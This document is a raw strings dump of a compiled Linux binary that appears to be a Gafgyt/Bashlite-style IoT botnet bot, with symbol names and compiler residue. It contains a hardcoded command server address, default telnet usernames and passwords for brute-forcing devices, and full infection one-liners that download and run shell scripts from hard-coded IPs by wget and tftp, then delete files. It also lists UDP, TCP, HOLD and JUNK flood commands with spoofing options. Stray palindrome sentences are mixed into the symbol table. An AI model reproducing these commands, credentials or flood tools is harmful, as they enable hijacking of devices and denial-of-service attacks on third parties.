PTRh
<suM
<duJ
<xuJ
<XuJ
<uuG
<cuU
<ru3
;E }
\[^_]
[^_]
Degas are we not drawn onward no In union drawn onward to new eras aged
WVSQ
L$$S
D$ S
L$$S
D$ S
UWVS
[^_]
UWVS
\$0e
[^_]
[^_]
T$ S
9S@t
K8u`
C<RRS
PPSj
c9Y@t&
QPRS
t@;C
UWVS
ZY[^_]
|$HPh
D$ P
RRVj
PPVj
D$ Pj
RRVj
PPVj
RRVj	
PPVj	
D$ e
RRVj
PPVj
D$ Pj
D$<P
XZSh
D$,PS
UWVS
\$Th
D$8P
uO;- 
uG;t$
48#t$$
t$ #D$$
;L$(r"
D$8P
[^_]
[^_]
u99K
;U,tK
[^_]
UWVS
u:9z
QQPS)
[^_]
D$0 
D$(Pj
\$ S
D$,Ph
UWVS
G;<$|
XZKy
[^_]
UWVS
[^_]
Z[^_
UWVS
 <xu
(<`v
}3A9
t$$h|i
8cu"
0h=L
D$ =
[^_]
D$0u3e
D$,PPj
D$8PP
D$0Pj
SuMe
PPSh(P
UWVS
t@;D$|u
t+PPj/
D$(j
t$LW
RRPj
xOQQ
D$ %
3PPj
UWVS
D$D@PS
T$<:
T$41
|$<HG
T$4;l$
PPWS
T$<:
[^_]
9S@t
UWVS
[^_]
UWVS
<rtB<w
t;<af
[^_]
UWVS
wsQUWR
[^_]
[^_]
UWVS
[^_]
9S@t
K8uN
C<;C
9S@t
K8uG
C<QS
Z %0
UWVS
t'9s@t
[^_]
UWVS
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
\$4u
t$8R
t$8S
[^_]
UWVS
D$(Q
|$01
[^_]
+q(e
t$|Q
FTX[^_
VHZ[^_
[^_]
9S@t
x:PW
5.39.55.243:23
root
admin
user
login
ubnt
guest
changeme
(null)
buf: %s
/bin/sh
/proc/cpuinfo
BOGOMIPS
PING
recv: %s
:>%$#
%d.%d.%d.%d
%d.%d.%d.0
ogin:
assword:
ncorrect
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://77.81.110.222/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 77.81.110.222 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 77.81.110.222; chmod 777 tftp2.sh; sh tftp2.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * 
/bin/busybox;echo -e '\147\141\171\146\147\164'
gayfgt
multi-call
REPORT %s:%s:%s
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.39.55.243/bin.sh; chmod 777 bins.sh; sh bins.sh; tftp 5.39.55.243 -c get bin2.sh; chmod 777 bin2.sh; sh bin2.sh; tftp -r tftp2.sh -g 77.81.110.222; chmod 777 tftp2.sh; sh tftp2.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * 
REPORT %s:%s:
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
PONG!
GETLOCALIP
My IP: %s
SCANNER
SCANNER ON | OFF
HOLD
HOLD <ip> <port> <time>
HOLD Flooding %s:%d for %d seconds.
JUNK
JUNK <ip> <port> <time>
JUNK Flooding %s:%d for %d seconds.
UDP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <packet size (1 to 65500)> (time poll interval, default 10)
UDP Flooding %s for %d seconds.
UDP Flooding %s:%d for %d seconds.
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
TCP Flooding %s for %d seconds.
KILLATTK
Killed %d.
None Killed.
LOLNOGTFO
8.8.8.8
/proc/net/route
	00000000	
MAC: %02X:%02X:%02X:%02X:%02X:%02X
fork failed
Failed to connect...
BUILD %s
PONG
%s 2>&1
Link closed by server.
?/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
set_thread_area failed when setting up thread-local storage
CAk[S
libpthread/nptl/sysdeps/unix/sysv/linux/close.S
__libc_close
int:t(0,1)=r(0,1);-2147483648;2147483647;
__libc_close:F(0,1)
__libc_open
__libc_open:F(0,1)
__libc_write
__libc_write:F(0,1)
__libc_read
__libc_read:F(0,1)
__waitpid
__waitpid:F(0,1)
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
A Santa lives evil at NASA
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
God A red nugget A fat egg under a dog
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.tbss
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.stab
.stabstr
.comment
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
__do_global_dtors_aux
completed.4963
p.4961
frame_dummy
object.4975
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
Snake.c
i.4852
printchar
prints
printi
print
fdopen_pids
hextable
ipState
__syscall_fcntl.c
_exit.c
chdir.c
dup2.c
getdtablesize.c
getrlimit.c
ioctl.c
kill.c
pipe.c
select.c
__syscall_select
setsid.c
sigprocmask.c
time.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_b_data
__C_ctype_toupper.c
__C_ctype_toupper_data
errno.c
__errno_location.c
puts.c
_L_lock_18
_L_unlock_59
_stdio.c
_stdio_streams
_fixed_buffers
_wcommit.c
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strstr.c
strtok.c
next_start.1613
isatty.c
tcgetattr.c
Beeb
ntohl.c
inet_ntoa.c
buf.4724
inet_makeaddr.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sysconf.c
nprocessors_onln
fork.c
_L_lock_70
_L_unlock_167
register-atfork.c
_L_lock_28
fork_handler_pool
_L_unlock_93
getpid.c
raise.c
sleep.c
pseudo_cancel
SAVEBX1
RESTBX1
pseudo_end
PUSHBX1
POPBX1
libc-cancellation.c
__uClibc_main.c
__pthread_return_0
__check_one_fd
__syscall_error.c
sigaction.c
__restore_rt
__restore
__socketcall.c
__syscall_rt_sigaction.c
execve.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getuid.c
munmap.c
nanosleep.c
__syscall_nanosleep
sbrk.c
closedir.c
opendir.c
fd_to_DIR
C.11.5298
readdir64.c
parse_config.c
fclose.c
_L_lock_53
_L_unlock_65
_L_unlock_82
_L_lock_103
_L_unlock_113
fopen.c
_WRITE.c
_fopen.c
_L_lock_205
alula
_L_lock_216
_L_unlock_232
_L_unlock_242
_fwrite.c
_trans2w.c
_uintmaxtostr.c
fgetc.c
_L_lock_35
fgets.c
_L_unlock_43
fflush_unlocked.c
_L_lock_13
_L_lock_30
_L_unlock_88
_L_unlock_104
_L_lock_144
_L_unlock_156
_L_lock_164
_L_unlock_174
_L_lock_195
_L_unlock_239
fgetc_unlocked.c
fgets_unlocked.c
strchrnul.c
strrchr.c
memrchr.c
strcspn.c
strspn.c
strtok_r.c
strpbrk.c
inet_aton.c
calloc.c
realloc.c
libc-tls.c
init_static_tls
static_slotinfo
static_dtv
static_map
dl-support.c
brk.c
fstat.c
mremap.c
xstatconv.c
getdents64.c
fseeko.c
fseeko64.c
_L_lock_34
_L_unlock_108
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
rawmemchr.c
mempcpy.c
llseek.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__GI_execve
__libc_sigaction
strcpy
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
waitpid
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI_time
getgid
__getpid
sysconf
stdout
random
__GI_getpagesize
getdtablesize
fdopendir
__GI___ctype_toupper
putc_unlocked
recv
connect
__GI___uClibc_fini
numpids
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__xstat32_conv
__uClibc_fini
memrchr
geteuid
__GI_setsid
sendTCP
__GI_strpbrk
__GI_fgetc
__GI_htonl
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
getRandomPublicIP
__write
getc_unlocked
__ctype_b
__GI_random_r
usernames
errno
getegid
__GI_sbrk
zprintf
__GI___uClibc_init
__libc_h_errno
execve
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
wildString
__waitpid_nocancel
__read
getc
_dl_tls_static_used
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
__GI___open_nocancel
_stdio_openlist_dec_use
sclose
Do nine men interpret Nine men I nod
__libc_select
puts
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
getuid
__GI_htons
malloc
__open
isatty
sleep
__GI_read
__GI___write_nocancel
random_r
__dso_handle
__nptl_deallocate_tsd
tcpcsum
fdpclose
socket
Eleele
__GI_dup2
select
_dl_nothread_init_static_tls
__GI_ntohl
_pthread_cleanup_pop_restore
__GI___libc_fcntl
__GI_memset
__GI_closedir
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
__GI_opendir
__libc_disable_asynccancel
__GI_open
__GI_strchr
sigaddset
_dl_tls_static_align
__GI_tcgetattr
__environ
mmap
__GI_ntohs
_Exit
makeIPPacket
_dl_tls_max_dtv_idx
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_fwrite_unlocked
__GI___register_atfork
__GI_getgid
srandom_r
__open_nocancel
_init
__GI_inet_ntoa_r
__GI_setstate_r
parseHex
strtol
__GI___read
pipe
rawmemchr
__GI_mempcpy
Borrow or rob
__malloc_state
__sigaddset
strrchr
nanosleep
__GI_send
calloc
h_errno
__pthread_mutex_unlock
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
rindex
__GI_execl
__GI_srandom_r
__GI___sigismember
write
__fork_generation_pointer
environ
__GI_close
fstat
kill
fputs_unlocked
__pthread_mutex_trylock
__GI___sigaddset
__GI_brk
_dl_tls_static_size
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
__GI___libc_write
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
setsockopt
bsd_signal
fseek
mremap
__GI_kill
__GI_strcmp
__GI___open
setstate
__read_nocancel
__stdio_READ
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
_dl_tls_dtv_slotinfo_list
__progname
_start
__deregister_frame_info_bases
__GI___read_nocancel
strstr
__GI_ioctl
init_rand
rand
Tacocat
__libc_errno
signal
read
__xstat64_conv
getCores
__GI_memcpy
strcoll
_stdio_user_locking
__linkin_atfork
__GI___libc_close
program_invocation_short_name
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
realloc
__register_atfork
_dl_tls_dtv_gaps
__libc_send
currentServer
readdir64
__GI_getrlimit
__GI_strcpy
strtok
__GI___fputc_unlocked
__stdio_adjust_position
malloc_trim
fork
__GI___fcntl_nocancel
__stdio_rfill
gotIP
__GI_sleep
sigaction
_dl_phdr
__GI_getc_unlocked
__uClibc_init
__GI_munmap
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
__libc_close
__GI_getpid
inet_aton
_pthread_cleanup_push_defer
index
processCmd
__sigismember
fopen
__bss_start
__libc_open
__pthread_unwind
__GI_strchrnul
getOurIP
memset
__GI_socket
main
listFork
__stdio_fwrite
_dl_tls_setup
negotiate
srand
_dl_tls_generation
__nptl_nthreads
initstate
fclose
__syscall_rt_sigaction
ntohs
sendUDP
inet_ntoa
tcgetattr
time
opendir
__GI_abort
__GI___write
fdpopen
__GI___sigdelset
__GI___close_nocancel
__GI__exit
strcmp
__GI_strrchr
data_start
__GI_sysconf
__fork_handlers
__h_errno_location
__GI_putc_unlocked
matchPrompt
__libc_enable_asynccancel
_stdio_fopen
_fini
__GI_chdir
__write_nocancel
__vfork
__GI_mmap
fgetc
fdgets
__get_pc_thunk_bx
__GI_select
__libc_waitpid
strcspn
__GI_waitpid
_stdio_term
__GI_signal
stderr
__GI_readdir64
commServer
vfork
__C_ctype_b
__libc_setup_tls
srandom
__GI___libc_waitpid
__GI_sendto
__GI_sigemptyset
__waitpid
__libc_fork
__close_nocancel
_dl_init_static_tls
__atexit_lock
scanPid
__fork_lock
__fcntl_nocancel
rand_cmwc
getsockopt
__GI_fseeko64
_dl_tls_static_nelem
fflush_unlocked
__stdio_wcommit
__GI___fgetc_unlocked
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
__GI___waitpid
__close
_edata
__stdout
__GI___close
__GI_memrchr
__GI_fflush_unlocked
__GI_isspace
__GI_strstr
__GI_fstat
_end
htons
__GI_fputc_unlocked
_sigintr
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
_dl_phnum
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
_dl_aux_init
sendJUNK
atoi
_stdio_openlist_del_lock
__GI_inet_aton
_setjmp
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__getdents64
__lll_lock_wait_private
strlen
lseek64
open
program_invocation_name
toupper
__libc_write
__malloc_consolidate
__GI_strtol
__GI_getuid
__GI_strtok_r
__fork
__libc_sendto
__stdio_trans2w_o
__GI_vfork
__GI_config_read
strchr
__GI_rawmemchr
__GI_raise
__data_start
setsid
__GI_inet_addr
__GI_config_open
closedir
_Jv_RegisterClasses
macAddress
__GI___libc_read
__GI___errno_location
fputc_unlocked
strchrnul
readUntil
fcntl
__GI_atoi
fseeko64
__GI_getsockname
close
__GI_config_close
__libc_connect
passwords
__GI_strlen
sendHOLD
mainCommSock
pids
__progname_full
strpbrk
getBogos
__lll_unlock_wake_private
raise
free
__GI_strcspn
sigprocmask
__fputc_unlocked
getsockname
